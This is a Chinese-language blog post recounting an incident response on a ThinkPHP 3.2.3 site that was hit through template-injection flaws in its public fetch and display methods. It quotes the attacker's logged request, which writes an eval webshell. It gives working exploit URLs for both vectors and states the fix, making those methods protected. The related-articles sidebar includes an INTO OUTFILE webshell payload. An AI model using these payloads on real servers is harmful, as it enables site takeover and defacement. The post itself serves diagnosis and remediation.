记一次tp3.2.3因fetch导致的漏洞处理过程

最新推荐文章于 2024-05-16 09:31:14 发布
最新推荐文章于 2024-05-16 09:31:14 发布
阅读量1.5k 收藏
点赞数
分类专栏: PHP Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tiancityycf/article/details/106555608
版权
PHP 同时被 2 个专栏收录
99 篇文章 2 订阅
订阅专栏
Linux
66 篇文章 1 订阅
订阅专栏

参考:https://www.phpmianshi.com/?id=108

 

问题描述:

 

最近发现百度收录大幅度下降,并出现大量5xx错误,有些收录页面直接跳转到其他网站,如下图:

图片.png

 

 

问题追查

1.根据以往经验首先怀疑网站被植入或者挂马

          于是排查系统日志,因为php项目的植入基本是通过eval植入的,所以我们直接:

          grep eval   nginx.log   发现类似如下日志:

{ "@timestamp": "02/Jun/2020:22:26:21 +0800", "remote_addr": "10.105.193.11", "referer": "-", "request": "GET 
/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
 HTTP/1.1", "status": 200, "bytes": 5, "agent": "Mozilla/4.0 
(compatible; MSIE 9.0; Windows NT 6.1)", "x_forwarded": 
"185.207.155.138, 10.105.193.84", "up_addr": "unix:/tmp/php-cgi.sock","up_host": "-","up_resp_time": "0.021","request_time": "0.020" }

2.根据日志基本确定就是被植入了,结合我们网站和wap使用的框架,确定这是tp3.2.3的漏洞

            漏洞概述


            远程攻击者在无需任何权限情况下,可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到getshell的目的。

 

    ​    ​    ​一共有两种方式植入:
    ​    ​    ​第一种是通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件

    ​    ​    ​fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。这里fetch函数的三个参数分别对应模板文件,输出内容,模板缓存前缀。利用时templateFile和prefix参数可以为空,在content参数传入待注入的php代码即可getshell

    ​    ​    ​第二种是通过构造a参数的display方法,实现任意内容包含漏洞

    ​    ​  ​display函数的作用是加载模板和页面输出

          所对应的参数为:
    ​    ​  ​$templateFile 指定要调用的模板文件

    ​    ​  ​$charset 模板输出字符集

    ​    ​  $contentType 输出类型,$content 模板输出内容。

    ​    ​  ​templateFile参数会经过parseTemplate函数处理,判断模板是否存在,当模板不存在时会在当前目录下开始查找,然后调用Thinkphp Controller 函数的display方法


 

3.实战演练

         我们通过fetch方法构造url如下:www.phpmianshi.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

         然后执行上面的url就可以在项目目录写入test.php  打印服务器的phpinfo信息,打开 www.phpmianshi.com/test.php 发现可以直接看到phpinfo

 

    ​    ​我们通过display方法构造url如下:www.phpmianshi.com/?a=display&templateFile=phpmianshi.txt

         然后执行上面的url就可以直接显示phpmianshi.txt的内容

 

         根据ThinkPHP框架规则,可以通过 g\m\a 参数指定分组(group)\模块(model)\动作或方法(action),我们打开 Application\Common\Controller 路径下的 BaseController.class.php 可以看到通过a参数直接调的这几个权限为 public 的方法

 

解决方案

1.这边有问题的是display函数和fetch函数,display 和 fetch 函数的修饰符改为 protected  即可修复

2. 修复完成后,我们再执行 第三步:实战演练中的操作,发现不会再有植入的代码,说明修复成功

 

 

 

私念
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp3.2.3及以下版本漏洞整理
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
【安全漏洞】ThinkPHP 3.2.3 漏洞复现.md
2201_75660665的博客
12-08 861
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
9-PHP代码审计——thinkphp3.2.3数据库内核注入漏洞
网络安全
04-29 572
漏洞利用的poc: http://www.tptest.com/index.php/home/index/index?username[0]=exp&username[1]==%27admin%27 数据库内核注入漏洞是thinkphp框架的数据库模块产生的漏洞,我们先通过一个案例来分析数据库操作模块的流程: 后台接收url请求中的username拼接到后台中执行,最终将查询到的内容返回,为了分析sql执行过程,开启debug调试模式。 class IndexContr..
【求大神帮助】thinkphp3.2.3老是被篡改入口文件
lieren141的博客
01-17 729
thinkphp3.2.3老是被篡改入口文件,有时候还要被修改Public里样式文件夹里的js 1.6.2 或1.7文件,改完后在百度里找到网站点击后就跳转到别的地方了,还有时候要被修改Think里面的Think.php文件。3、全总代码里的上传功能都干掉了,富文本框里的没有禁用(使用的是ueditor4.3)4、服务从windows换成linux再换成windows每次都要用安全狗扫一遍。6、安全狗扫出来的问题全部解决了,甚至把文件都删除了。2、几个文件夹设置了权限。5、安装了安全狗网站版。
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞
最新发布
程序员六七的博客
05-16 497
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
fetch请求php的坑,fetch请求问题
weixin_30026331的博客
03-28 499
首先, 数据要在网络上传输, 就会涉及到数据序列化的问题, 因为双边数据在内存中的形式极有可能不一样, 这个时候需要约定一种双边都认可并且能实现的序列化方式, 使得数据能够被发送方序列化, 并且在网络中传输, 最终被接收方正确的反序列化.为了适应不同的数据以及客户端环境, HTTP协议约定通过请求头中的Content-Type字段来确定数据序列化协议, 常用的有:application/x-www...
thinkphp3.2源码------ 错误和异常处理
小菜鸟正洋洋的博客
05-31 7061
写在前面:tp3.2中每次载入入口文件时都会进行错误和异常的捕获,解读这一部分代码可以对以后的优化很有好处。 处理概览:      错误捕获与处理: 致命错误捕获: 我们尝试在 Home/Index/index 下调用一个未定义的函数,会看到这样的提示页面:      我们可以看到tp3.2处理了致命异常的输出,并且
建站管家多语言企业建站系统 TP3.2.3
10-07
《建站管家》ThinkPHP3.2.3版本介绍: 1、基于ThinkPHP3.2.3的中英双语企业建站系统 2、可自行扩展多语言(默认中英文) 3、前台及后台均支持手机版+电脑版 4、自定义URL前缀 5、多级分类
layui框架实现文件上传及TP3.2.3(thinkPHP)对上传文件进行后台处理操作示例
10-18
主要介绍了layui框架实现文件上传及TP3.2.3对上传文件进行后台处理操作,结合实例形式分析了layui框架结合thinkPHP进行文件上传与处理操作相关实现技巧,需要的朋友可以参考下
TP3.2.3框架文件上传操作实例详解
10-15
主要介绍了TP3.2.3框架文件上传操作,结合实例形式详细分析了thinkPHP3.2.3框架文件上传相关原理、实现方法与操作注意事项,需要的朋友可以参考下
tp3.2.3快速入门
09-23
tp3.2.3构架快速入门,ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发 布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体 ...
TP3.2.3倒计时.rar_FZK_cypt倒计时软件_thinkphp3.2.3_tp3.2倒计时_倒计时
09-23
这里我们关注的是一个基于ThinkPHP 3.2.3框架实现的倒计时解决方案,名为"TP3.2.3倒计时",由FZK_cypt开发。这个软件包主要提供了在网页上实时显示动态倒计时的能力,当设定的时间到达时,页面会自动切换到预设的...
解决TP5项目被恶意篡改、注入代码问题
IT-Andy
07-03 7366
首先,谈谈这个曲折的经历! 第一次,被人用eval()函数注入了文件,发现后,我就禁了这些PHP高危险函数! 第二次,就是被人在入口文件中注入了代码,在public文件夹中,多出了很多文件。然后我就修改了宝塔面板的密码,加上下面的第2步,目前暂时没有被注入了,希望能帮到大家! 如果还有更好的办法,希望不吝赐教,留下你宝贵的经验,万分感谢! 1、禁掉...
项目入口文件index.php被篡改后果,为什么我把入口文件index.php移到public外面,再修改入口文件如下,但是无法显示页面...
weixin_36336411的博客
03-11 651
// +----------------------------------------------------------------------// | ThinkPHP [ WE CAN DO IT JUST THINK ]// +----------------------------------------------------------------------// | Copyri...
该内容被禁止访问原来是入口文件被恶意篡改
Nobita
02-12 688
检查index.php 发现,多了以下代码: <?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGENT"]; if(strpos($key,'google')!== false||strpos($key,'baidu')!==false||strpos($key,'sogou...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
Thinkphp3 DB类库中录慢查询日志
backerli的博客
07-24 197
客户提供的是PASS服务,无法开放MySQL管理后台给我们来用,所有查不到相关慢日志,只能在PHP上开启慢日志查询。Thinkphp3 框架内有封装的DB查询类库,找到Mysql DB类库。在方法里面加以下代码内容即可监控SQL 查询语句的执行时间。里面有一个select方法。写日志的代码段(仅供参考)
ThinkPHP RCE漏洞分析合集
hackzkaq的博客
03-18 4222
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek 一. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行 0x00 背景 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 0x01 实验环境 系统环境 服务器主机:centOS 7 php 5.4版本,apache2,ThinkPHP 5.0.10 0x02 漏洞利用 将 applicati
漏洞复现】ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4149
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行)漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意,如果使用PHP7,在调用有参函数但没有传入参数的情况下会报错,因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.csdn.net/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞】ThinkPHP 3.2.3 漏洞复现](https://blog.csdn.net/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值